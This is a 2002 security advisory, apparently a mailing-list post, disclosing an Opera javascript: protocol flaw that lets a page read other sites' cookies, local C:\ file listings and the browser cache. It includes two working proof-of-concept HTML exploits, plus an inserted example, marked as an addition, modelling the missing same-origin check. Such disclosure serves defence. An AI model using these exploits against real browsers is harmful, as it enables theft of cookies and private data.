Opera javascript protocol vulnerability [Sandblad advisory #6]

From: Andreas Sandblad (sandbladat_private)
Date: Wed May 15 2002 - 09:57:59 PDT


                      - Sandblad advisory #6 -
    
    ---..---..---..---..---..---..---..---..---..---..---..---..----
    Title:      Opera javascript protocol vulnerability
    Date:       [2002-05-15]
    Software:   At least Opera 6.01, 6.0, 5.12 (win)
    Rating:     High because Opera is assumed to be secure
    Impact:     Read cookies/local filestructure/cache
    Vendor:     Opera has confirmed the vulnerability and released
                today a new version 6.02 fixing the issue.
                http://www.opera.com/                  _     _
    Workaround: Disable javascript.                  o' \,=./ `o
    Author:     Andreas Sandblad, sandbladat_private   (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    
    
    DESCRIPTION:
    ============
    Opera allows the location of a frame to be overwritten by a URL
    using the javascript: protocol. The JavaScript code then runs in the
    same domain as the URL that was overwritten. Thus we can read
    cookies from other domains, the local file structure and private
    information from the cache (history of links visited).
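
The check whose absence is described above, as an added example that is not part of the advisory or of Opera's code: a model of the same-origin rule a browser must apply before it executes a javascript: URL that one document assigns to another frame's location. parseOrigin, sameOrigin and mayNavigate are hypothetical names, and the example URLs in the comments are constructed.

```javascript
// Model of the navigation policy that prevents the cross-domain javascript:
// frame attack: a javascript: URL assigned to a frame only runs if the
// document assigning it is same-origin with the frame's current document.
// Hypothetical helper names; not taken from any browser's source.

// Reduce a URL to its origin tuple (scheme, host, port). Schemes without a
// network authority (file:, opera:cache) get an opaque origin that never
// matches anything, so no script from a web page can run in them.
function parseOrigin(url) {
  const m = /^([a-z][a-z0-9+.-]*):(?:\/\/([^/:?#]*)(?::(\d+))?)?/i.exec(url.trim());
  if (!m) return null;
  const scheme = m[1].toLowerCase();
  if (scheme !== "http" && scheme !== "https") {
    return { opaque: true };
  }
  const defaultPort = scheme === "https" ? "443" : "80";
  return { scheme, host: m[2].toLowerCase(), port: m[3] || defaultPort };
}

// Two origins match only if scheme, host and port are all equal; an opaque
// origin is never equal to anything, including itself.
function sameOrigin(a, b) {
  if (!a || !b || a.opaque || b.opaque) return false;
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// May a document at navigatorUrl set a frame whose current document lives at
// targetUrl to newUrl?  Ordinary URLs are always allowed because they replace
// the frame with a fresh document in that URL's own origin.  A javascript: URL
// would run inside the *existing* document, so it needs same-origin.
// Example (constructed): a page on http://a.example/ may not set a frame
// showing http://www.google.com/ to "javascript:alert(document.cookie)".
function mayNavigate(navigatorUrl, targetUrl, newUrl) {
  if (!/^javascript:/i.test(newUrl.trim())) return true;
  return sameOrigin(parseOrigin(navigatorUrl), parseOrigin(targetUrl));
}
```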
    
    
    EXPLOIT I:
    ==========
    The following exploit has been tested to work on Opera 6.01, 6.0 (win). It
    will not work on 5.x because it requires the iframe feature.
    
    ------------------- CUT HERE -----------------------------------
    <iframe name=cookie src="http://www.google.com/" height=0
    width=0></iframe>
    <iframe name=files src="file://c:/" height=0 width=0></iframe>
    <iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
    <a href="javascript:readCookie()">Read google cookie</a><br>
    <a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
    <a href="javascript:readCache()">Read links in cache</a><br>
    <script>
    function readCookie(){
      cookie.location="javascript:alert(document.cookie)";
    }
    function readFiles(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      files.location = t;
    }
    function readCache(){
      t = 'javascript:s="";l=document.links;';
      t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
      cache.location = t;
    }
    </script>
    ------------------- CUT HERE -----------------------------------
    
    
    EXPLOIT II:
    ===========
    For versions of Opera not supporting the iframe tag the exploit must be
    done using the frame tag instead. The following exploit has been tested on
    Opera 6.01, 6.0, 5.12 (win).
    
    ------------------- CUT HERE -----------------------------------
    <HTML>
    <FRAMESET ROWS="100%,0,0,0">
    <FRAME SRC="payload.html">
    <FRAME NAME="cache" src="opera:cache" noresize>
    <FRAME NAME="files" src="file:///c:/" noresize>
    <FRAME NAME="cookie" src="http://www.google.com/" noresize>
    </FRAMESET>
    </HTML>
    ------------------- CUT HERE -----------------------------------
    payload.html:
    ------------------- CUT HERE -----------------------------------
    <a href="javascript:alert(document.cookie)" target="cookie">Google
    cookie</a><br>
    <a href="javascript:alert(document.links.item(0))" target="cache">First
    item in cache</a><br>
    <a href="javascript:alert(document.links.item(1))" target="files">First
    file/directory in c:\ (win)</a>
    ------------------- CUT HERE -----------------------------------
    
    
    Disclaimer:
    ===========
    Andreas Sandblad is not responsible for the misuse of the
    information provided in this advisory. The opinions expressed
    are my own and not of any company. In no event shall the author
    be liable for any damages whatsoever arising out of or in
    connection with the use or spread of this advisory. Any use of
    the information is at the user's own risk.
    
    
    Old advisories:
    ===============
    #5 [2002-04-26] "Mp3 file can execute code in Winamp."
    http://online.securityfocus.com/archive/1/269724
    #4 [2002-04-15] "Using the backbutton in IE is dangerous."
    http://online.securityfocus.com/archive/1/267561
    
    
    Feedback:
    =========
    Please send suggestions and comments to:           _     _
    sandbladat_private                              o' \,=./ `o
                                                        (o o)
    ---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
    Andreas Sandblad,
    student in Engineering Physics at the University of Umea, Sweden.
    -/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
    